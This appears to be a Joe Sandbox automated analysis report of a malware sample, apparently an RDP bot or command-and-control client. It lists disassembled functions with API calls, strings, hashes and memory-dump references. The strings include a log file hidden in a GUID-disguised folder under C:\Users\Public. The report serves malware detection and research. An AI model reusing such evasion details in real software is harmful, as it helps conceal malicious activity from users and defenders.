Opcode Fuzzy Hash: b1022f743a2f32e36fad29669ebae11abbf00a4173a88319de3ccb1d9b5534a7
Instruction Fuzzy Hash: A451CC72A09F8281E7218B56E8803AD7669AB417F4F0443B9E97D076F4EF3DE505CB01

Function 00007FFE1150D278 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyExA.ADVAPI32 ref: 00007FFE1150D29B

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

(root != NULL), xrefs: 00007FFE1150D2DD
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE1150D34D
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1150D2D6, 00007FFE1150D306
(key != NULL), xrefs: 00007FFE1150D30D
u, xrefs: 00007FFE1150D2FE
[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1150D374
NULL, xrefs: 00007FFE1150D4A8
registry_delete_key, xrefs: 00007FFE1150D2B1, 00007FFE1150D2E4, 00007FFE1150D314, 00007FFE1150D346, 00007FFE1150D36D
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE1150D2B8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150D2EB, 00007FFE1150D31B

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Deletefflushfwrite
String ID: (key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
API String ID: 2939363742-2883486457
Opcode ID: 19f597cc69295e8de2f37fb7281aa2e9243a20abc6b1d7248109f68b491ec34f
Instruction ID: 3a2f2896eae63e1eaec8aa5f1833859fcfa15c1c62d66b697a0f267e7903c63c
Opcode Fuzzy Hash: 19f597cc69295e8de2f37fb7281aa2e9243a20abc6b1d7248109f68b491ec34f
Instruction Fuzzy Hash: DD412962D0CD1381FB21569BA4403FC63596F003B4F8A51BADC5E671B5DEACBD858382

Function 00007FFE133079F8 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyExA.ADVAPI32 ref: 00007FFE13307A1B

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

(key != NULL), xrefs: 00007FFE13307A8D
[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE13307AF4
(root != NULL), xrefs: 00007FFE13307A5D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13307A6B, 00007FFE13307A9B
u, xrefs: 00007FFE13307A7E
NULL, xrefs: 00007FFE13307C28
registry_delete_key, xrefs: 00007FFE13307A31, 00007FFE13307A64, 00007FFE13307A94, 00007FFE13307AC6, 00007FFE13307AED
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE13307ACD
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE13307A56, 00007FFE13307A86
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE13307A38

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Deletefflushfwrite
String ID: (key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
API String ID: 2939363742-2883486457
Opcode ID: 09eaa57c91d6cc6535543957ddd418d7c63991fba1ae61b25518d4ee7d6eebe0
Instruction ID: e3a7b66168865e6b59d730b285aa3a2e2de534aa210806e339c6ee5c937ca59b
Opcode Fuzzy Hash: 09eaa57c91d6cc6535543957ddd418d7c63991fba1ae61b25518d4ee7d6eebe0
Instruction Fuzzy Hash: A1415C62D1CD53D9FA229646A8443FC56406F20774F4901F2CC7E772B6DE2DAE85838D

Function 00007FFE11507C35 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32 ref: 00007FFE11507C7D
CloseHandle.KERNEL32 ref: 00007FFE11507C8E

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE11507D44

Strings

fs_file_unlock, xrefs: 00007FFE11507C97, 00007FFE11507CCC, 00007FFE11507CFD, 00007FFE11507D28, 00007FFE11507D52
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FFE11507D2F
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11507CBE, 00007FFE11507CEF
(lock != NULL), xrefs: 00007FFE11507CC5
[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FFE11507D59
((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FFE11507CF6
[I] (%s) -> Done(lock=%p), xrefs: 00007FFE11507C9E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11507CD3, 00007FFE11507D04

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-345319545
Opcode ID: a3752f7d6040ae1acfe5736b31f4d48a3bbe53a3b57d5ad776e953d24dd67a7d
Instruction ID: fd4227f463e8a2f693931aaedb7e7f74d099f81d1d439d4956e42fdbba712dfd
Opcode Fuzzy Hash: a3752f7d6040ae1acfe5736b31f4d48a3bbe53a3b57d5ad776e953d24dd67a7d
Instruction Fuzzy Hash: BB4170A3B0CD4391FB21479BE440BBC271A6F51778F5446B6C99E176F4EE2CEA468301

Function 00007FFE13305675 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32 ref: 00007FFE133056BD
CloseHandle.KERNEL32 ref: 00007FFE133056CE

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

GetLastError.KERNEL32 ref: 00007FFE13305784

Strings

[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FFE13305799
((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FFE13305736
fs_file_unlock, xrefs: 00007FFE133056D7, 00007FFE1330570C, 00007FFE1330573D, 00007FFE13305768, 00007FFE13305792
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FFE1330576F
(lock != NULL), xrefs: 00007FFE13305705
[I] (%s) -> Done(lock=%p), xrefs: 00007FFE133056DE
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13305713, 00007FFE13305744
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133056FE, 00007FFE1330572F

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-345319545
Opcode ID: 541d76c2a99c08245025ee683c083b3f3baa156604a7956340b341959958aa97
Instruction ID: f8ecae8af60ad04244a4f383a349ff6893c9ea38c9f8f84b506d0992a6aa9cbe
Opcode Fuzzy Hash: 541d76c2a99c08245025ee683c083b3f3baa156604a7956340b341959958aa97
Instruction Fuzzy Hash: 5E411FA1B0CD46C9FA244B17E440ABC16509F70BB8F5402B2D93E775F5DF6CA585A30D

Function 00007FFE11504692 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00007FFE115046B5
GetLastError.KERNEL32 ref: 00007FFE115046FC

Strings

P, xrefs: 00007FFE1150477F
, xrefs: 00007FFE1150471A
;, xrefs: 00007FFE115046CC
sys_mem_info, xrefs: 00007FFE115046E2, 00007FFE11504707
~, xrefs: 00007FFE1150477A
[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu), xrefs: 00007FFE1150470E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115046E9
(mi != NULL), xrefs: 00007FFE115046DB
H:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FFE115046D4

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorGlobalLastMemoryStatus
String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
API String ID: 3848946878-1815531218
Opcode ID: 3081ffa9ebe953570aef1344f32cc492ba65cacdf7d42788cc980c48630e6be7
Instruction ID: 17b637b0f03e9ff80dd9f6316370e40c04df08c095df840811d9a0785f601471
Opcode Fuzzy Hash: 3081ffa9ebe953570aef1344f32cc492ba65cacdf7d42788cc980c48630e6be7
Instruction Fuzzy Hash: 05314450E1CF83C2FB61C79698D037C16589F65328F6456BBCA0E061F1EE6DA9C6C302

Function 00007FFE133020E2 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00007FFE13302105
GetLastError.KERNEL32 ref: 00007FFE1330214C

Strings

~, xrefs: 00007FFE133021CA
H:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FFE13302124
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13302139
;, xrefs: 00007FFE1330211C
sys_mem_info, xrefs: 00007FFE13302132, 00007FFE13302157
, xrefs: 00007FFE1330216A
[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu), xrefs: 00007FFE1330215E
P, xrefs: 00007FFE133021CF
(mi != NULL), xrefs: 00007FFE1330212B

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorGlobalLastMemoryStatus
String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
API String ID: 3848946878-1815531218
Opcode ID: 58a5b8131f7730c294c7a7b61195e634233caed24fe22c52eeb17413a9e62cf9
Instruction ID: fb3001a69145c5d90c0c0a7ffcf9b28e011f6cb6b8bfed07326f84abb52ef70e
Opcode Fuzzy Hash: 58a5b8131f7730c294c7a7b61195e634233caed24fe22c52eeb17413a9e62cf9
Instruction Fuzzy Hash: 70315C10E0CF4BCAFB68875AD88137C52409F35725F2041B3C72EA61B2DE6DA9C6D359

Function 00007FFE11508432 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FFE11508461
GetLastError.KERNEL32 ref: 00007FFE1150846C

Strings

fs_module_path, xrefs: 00007FFE11508484, 00007FFE115084BD, 00007FFE115084F1, 00007FFE11508521, 00007FFE11508554
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE1150848B
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115084E3, 00007FFE11508513, 00007FFE11508546
(path_sz != NULL), xrefs: 00007FFE1150854D
(path != NULL), xrefs: 00007FFE1150851A
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FFE115084C4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115084F8, 00007FFE11508528, 00007FFE1150855B
(hnd != NULL), xrefs: 00007FFE115084EA
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFE11508434

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
API String ID: 2776309574-3148421028
Opcode ID: 5a6faf5d8e9ec057bf839bbd4216e0bec5f7f99bed4a94510c5d976fa4d0c907
Instruction ID: 9e85a87cf88b07e7af9eb2f06e8b9e95bbe206ab4bb3718a673e7f7be9edf9a3
Opcode Fuzzy Hash: 5a6faf5d8e9ec057bf839bbd4216e0bec5f7f99bed4a94510c5d976fa4d0c907
Instruction Fuzzy Hash: 25316FA1E18E07A5FB119B9BE840BB8279DBF013B8F8840B5DD4D472B5EE3CA905C340

Function 00007FFE13307029 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 44synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FFE13307049
CloseHandle.KERNEL32 ref: 00007FFE13307056
WaitForSingleObject.KERNEL32 ref: 00007FFE1330706E
CloseHandle.KERNEL32 ref: 00007FFE1330707B
WaitForSingleObject.KERNEL32 ref: 00007FFE13307093
CloseHandle.KERNEL32 ref: 00007FFE133070A0
DeleteCriticalSection.KERNEL32 ref: 00007FFE133070B2
DeleteCriticalSection.KERNEL32 ref: 00007FFE133070C4

Strings

[I] (%s) -> %s, xrefs: 00007FFE1330711A
server_cleanup, xrefs: 00007FFE13307113
Done, xrefs: 00007FFE1330710C

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CloseHandleObjectSingleWait$CriticalDeleteSection
String ID: Done$[I] (%s) -> %s$server_cleanup
API String ID: 904620939-1981861988
Opcode ID: f2fd30ecb811a07a51ff5f666d00caf08de869e39acef24b8bcd4e9dcf5c8d2e
Instruction ID: e6712c6fbf140978a4c120441393d09f9e1e622fae259378f17c4c73a009c3c1
Opcode Fuzzy Hash: f2fd30ecb811a07a51ff5f666d00caf08de869e39acef24b8bcd4e9dcf5c8d2e
Instruction Fuzzy Hash: 0521A434A08E06C9EA649B2BED543383261BFA5774F5447B1D47E662F1CF3CA44A9348

Function 00007FFE115072F5 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE1150733B
GetFileSize.KERNEL32 ref: 00007FFE1150735E
CloseHandle.KERNEL32 ref: 00007FFE11507380
GetLastError.KERNEL32 ref: 00007FFE11507406
GetLastError.KERNEL32 ref: 00007FFE115074CC

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115073AE, 00007FFE115073DE
(path != NULL), xrefs: 00007FFE115073B5
(size != NULL), xrefs: 00007FFE115073E5
fs_file_size, xrefs: 00007FFE115073BC, 00007FFE115073EC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115073C3, 00007FFE115073F3

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-3761180060
Opcode ID: f963bb75f37f1334de3abcbc8f700d6cc002006ba2a234317531b1134649a698
Instruction ID: 8fa57617821dc1006fb03810e4250d06f3e1ad0560195db64a0367da6171a166
Opcode Fuzzy Hash: f963bb75f37f1334de3abcbc8f700d6cc002006ba2a234317531b1134649a698
Instruction Fuzzy Hash: F1618C61D0CE5382F7704686A5457BC6349AF01378F2946FACC9E8B6F4DE2DEC808742

Function 00007FFE13304D35 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE13304D7B
GetFileSize.KERNEL32 ref: 00007FFE13304D9E
CloseHandle.KERNEL32 ref: 00007FFE13304DC0
GetLastError.KERNEL32 ref: 00007FFE13304E46
GetLastError.KERNEL32 ref: 00007FFE13304F0C

Strings

fs_file_size, xrefs: 00007FFE13304DFC, 00007FFE13304E2C
(path != NULL), xrefs: 00007FFE13304DF5
(size != NULL), xrefs: 00007FFE13304E25
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13304E03, 00007FFE13304E33
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13304DEE, 00007FFE13304E1E

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-3761180060
Opcode ID: d5987f7009ceb68e5cbcca747f6a8a21f9eb83ddd08d55fbe6a1cc31b3dde8f8
Instruction ID: 6bcdc009f0082753c2bf4d14a8737447dc1c4acef7d98652cccb77687928975a
Opcode Fuzzy Hash: d5987f7009ceb68e5cbcca747f6a8a21f9eb83ddd08d55fbe6a1cc31b3dde8f8
Instruction Fuzzy Hash: AF614F61D0CD53CAFB604616A4443BC11805F70378F2646F2C93EBB6F6DE2DAE819B89

Function 00007FFE13305E72 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FFE13305EA1
GetLastError.KERNEL32 ref: 00007FFE13305EAC

Strings

(path_sz != NULL), xrefs: 00007FFE13305F8D
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE13305ECB
(hnd != NULL), xrefs: 00007FFE13305F2A
fs_module_path, xrefs: 00007FFE13305EC4, 00007FFE13305EFD, 00007FFE13305F31, 00007FFE13305F61, 00007FFE13305F94
(path != NULL), xrefs: 00007FFE13305F5A
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FFE13305F04
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13305F38, 00007FFE13305F68, 00007FFE13305F9B
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13305F23, 00007FFE13305F53, 00007FFE13305F86

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
API String ID: 2776309574-787847008
Opcode ID: ad643fe96f47ec709d9efece58a525c64fcade27588ba8776237aacb8be2f27b
Instruction ID: 83e758e783c041ff44f767e265e1d1fa651265204dcb5890e5b48f5c2c650904
Opcode Fuzzy Hash: ad643fe96f47ec709d9efece58a525c64fcade27588ba8776237aacb8be2f27b
Instruction Fuzzy Hash: 17312DB1A0CE47D9FA108B56EC007E82294AF203B8F4401B2DA6DB71B6DE7DA915D30C

Function 00007FFE11507616 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE11507675
GetFileTime.KERNEL32 ref: 00007FFE11507690
GetLastError.KERNEL32 ref: 00007FFE1150769E
CloseHandle.KERNEL32 ref: 00007FFE115077C0

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115076CB, 00007FFE115076FE
(path != NULL), xrefs: 00007FFE115076D2
fs_file_stat, xrefs: 00007FFE115076D9, 00007FFE1150770C
